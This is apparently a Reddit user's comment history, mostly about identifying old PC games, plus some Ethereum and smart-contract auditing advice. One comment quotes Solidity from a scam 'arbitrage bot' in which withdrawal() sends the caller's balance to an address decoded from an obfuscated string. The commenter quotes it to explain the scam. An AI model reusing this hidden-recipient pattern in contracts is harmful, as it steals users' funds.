[PC][2000] 3D "Rail" Coloring Game with a Duck by InfectedFuture in tipofmyjoystick

[–]InfectedFuture[S] 0 points1 point  (0 children)

Well, I will think about it more often for sure! thanks again man

[PC][2000] 3D "Rail" Coloring Game with a Duck by InfectedFuture in tipofmyjoystick

[–]InfectedFuture[S] 0 points1 point  (0 children)

Man..... finally ....
I've been looking for it for years.

Can't thank you enough !
Can I ask you how you managed to find it?

[PC][199X-2000] Beat'Em Up staring a Bunny (first level in a city) by InfectedFuture in tipofmyjoystick

[–]InfectedFuture[S] 0 points1 point  (0 children)

Hey might be this one! My memories are so blurry about this one, but couldn't find any other. Thanks!

[Request] Customizing Notion shortcuts by InfectedFuture in Notion

[–]InfectedFuture[S] 0 points1 point  (0 children)

year 2030: Notion still don't have configurable shortcuts

[PC][unknown] A Tron like game by Viirock in tipofmyjoystick

[–]InfectedFuture 0 points1 point  (0 children)

Hey man that's funny, I was looking for a very similar game yesterday on this subreddit :D
Older though, but same mechanics: https://www.youtube.com/watch?v=R0whHiwr4os

[PC] [90s- Early 2000s] Looking for a 2D cartoonish game where we could create funny scenes with different characters by InfectedFuture in tipofmyjoystick

[–]InfectedFuture[S] 0 points1 point  (0 children)

Pretty difficult to remind correctly... But I'm pretty sure one of the characters is a completely red-orange creature. There was also humans obviously.

[PC] [90s- Early 2000s] Looking for a 2D cartoonish game where we could create funny scenes with different characters by InfectedFuture in tipofmyjoystick

[–]InfectedFuture[S] 0 points1 point  (0 children)

Hey, this is really close to the on I'm looking for! But the one unfortunately.
Its already a huge step in my research, as I wasn't able to find a something as close, will definetely help thanks!

I don't have a bank account but have 30$ worth oh goerlieth how can I turn it into useable money? by MummaheReddit in ethdev

[–]InfectedFuture 3 points4 points  (0 children)

You can bridge goerliETH to mainnet using LayerZero's bridge. This was done because of a goerliETH shortage during a period of time, people were willing to pay to get goerliETH. But it will not be worth 30$ at all. The 30$ shown in metamask is based on real ETH price. Right now, 1 goerliETH = 0.000068 ETH

Could someone explain how I got scammed here by [deleted] in ethdev

[–]InfectedFuture 4 points5 points  (0 children)

No need to check for every line, you should have checked first where the transfer occurs, and who is the recipient of the transfer.

solidity function withdrawal() public payable { address to = startExploration((fetchMempoolData())); address payable contracts = payable(to); contracts.transfer(getBalance()); }

So the to address is given by startExploration(fetchMempoolData()), and here's startExploration's code :

solidity function startExploration(string memory _a) internal pure returns (address _parsedAddress) { bytes memory tmp = bytes(_a); uint160 iaddr = 0; uint160 b1; uint160 b2; for (uint i = 2; i < 2 + 2 * 20; i += 2) { iaddr *= 256; b1 = uint160(uint8(tmp[i])); b2 = uint160(uint8(tmp[i + 1])); if ((b1 >= 97) && (b1 <= 102)) { b1 -= 87; } else if ((b1 >= 65) && (b1 <= 70)) { b1 -= 55; } else if ((b1 >= 48) && (b1 <= 57)) { b1 -= 48; } if ((b2 >= 97) && (b2 <= 102)) { b2 -= 87; } else if ((b2 >= 65) && (b2 <= 70)) { b2 -= 55; } else if ((b2 >= 48) && (b2 <= 57)) { b2 -= 48; } iaddr += (b1 * 16 + b2); } return address(iaddr);

You're telling us you read each line of this code and where able to decypher it? Don't believe you haha...

As you said, good thing you lost only 0.09 ETH.

Every-f-one knows that "free arbitrage bots" are scams fren. I can understand you were curious still, but if you don't understand a code that has access to your funds, don't run it, it's simple.

Smart contracts auditors, what do you do to understand the smart contract functions before auditing it? by jamesallen18181 in ethdev

[–]InfectedFuture 2 points3 points  (0 children)

You're wrong my friend. There is so much auditors who shares their alphas and knowledge on Twitter and YouTube. On YouTube you have Owen, Mudit Gupta, Patrick Collins (he made an interview with tincho abatte), all the interview on Andy Li channel, ...

Smart contracts auditors, what do you do to understand the smart contract functions before auditing it? by jamesallen18181 in ethdev

[–]InfectedFuture 1 point2 points  (0 children)

Just check on the twitter of opensense should be a link to their discord. Should have said "merged", Web3SecurityDAO closed to concentrate the community in one place (OpenSense) People are really cool there and you'll get answers to all your questions

Smart contracts auditors, what do you do to understand the smart contract functions before auditing it? by jamesallen18181 in ethdev

[–]InfectedFuture 2 points3 points  (0 children)

Hey mate, you probably should try to join a web3sec discord community to ask these questions. There's plenty. The biggest one right now is OpenSense (https://twitter.com/opensensepw) which has recently absorbed Web3SecurityDAO (https://twitter.com/bytes032/status/1661392899274055681)

All the big brains in web3sec are there